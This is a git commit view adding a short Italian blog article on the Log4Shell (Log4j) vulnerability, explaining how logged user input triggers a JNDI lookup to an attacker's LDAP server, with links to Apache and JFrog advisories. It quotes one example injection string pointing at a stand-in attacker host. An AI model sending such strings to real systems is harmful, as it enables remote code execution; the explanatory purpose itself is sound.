aboutsummaryrefslogtreecommitdiff
path: root/articles/2021/20211213_log4shell-0-day-vulnerability.rhtml
diff options
context:
space:
mode:
Diffstat (limited to 'articles/2021/20211213_log4shell-0-day-vulnerability.rhtml')
-rw-r--r--articles/2021/20211213_log4shell-0-day-vulnerability.rhtml34
1 files changed, 34 insertions, 0 deletions
diff --git a/articles/2021/20211213_log4shell-0-day-vulnerability.rhtml b/articles/2021/20211213_log4shell-0-day-vulnerability.rhtml
new file mode 100644
index 0000000..cca7617
--- /dev/null
+++ b/articles/2021/20211213_log4shell-0-day-vulnerability.rhtml
@@ -0,0 +1,34 @@
+<h1>Gravi vulnerabilit&agrave in Log4j</h1>
+<div class="hyphens">
+ <p class="date-published">Alessandro Iezzi, 13 dicembre 2021</p>
+ <p class="italic">Questa vulnerabilit\&agrave; interessa solo amministratori
+ di sistema e programmatori Java e non i normali utenti.</p>
+
+ <p>La modalit&agrave; di attacco &egrave; molto semplice. Molte volte, si
+ tende a scrivere log di questo tipo:
+ <code>log.info("User input: {}", userInput)</code> e non c'&egrave; nulla
+ di sbagliato. Se l'utente prova ad inviare una stringa formata, per esempio,
+ in questo modo: <code>jndi:ldap://hacking.it/Exploit</code> entra in azione
+ la classe <code>JndiLookup</code> di <code>log4j-core</code>. La libreria,
+ effettua una chiamata verso quel server LDAP che gli risponder&agrave; con
+ l'URL di un sito web contenente l'exploit. L'exploit verr&agrave; eseguito
+ sul server da Log4j, rendendo inutili strumenti quali firewall e IDS/IPS.
+ </p>
+
+ <p class="italic">Alcuni utenti su GitHub avevano messo esempi di attacco ma
+ ad oggi (16 dicembre 2021) sono spariti. Se effettuate qualche ricerca,
+ forse riuscite a trovare ancora qualcosa.</p>
+
+ <p class="italic">Ho sentito un'intervista alla radio, l'intervistato
+ consigliava di aggiornare varie applicazioni mobile e sul computer
+ nonch&eacute; il sistema operativo. Questi consigli valgono sempre,
+ a prescindere dalle vulnerabilit&agrave;, in questo caso, l'utente tipico
+ NON deve fare assolutamente nulla, visto che la problematica riguarda noi
+ programmatori e amministratori di sistema.</p>
+
+ <h2>Riferimenti</h2>
+ <ul>
+ <li><a href="https://logging.apache.org/log4j/2.x/security.html">https://logging.apache.org/log4j/2.x/security.html</a></li>
+ <li><a href="https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/">https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/</a></li>
+ </ul>
+</div>
generated by cgit v1.2.3 (git 2.39.1) at 2025-08-08 17:11:49 +0000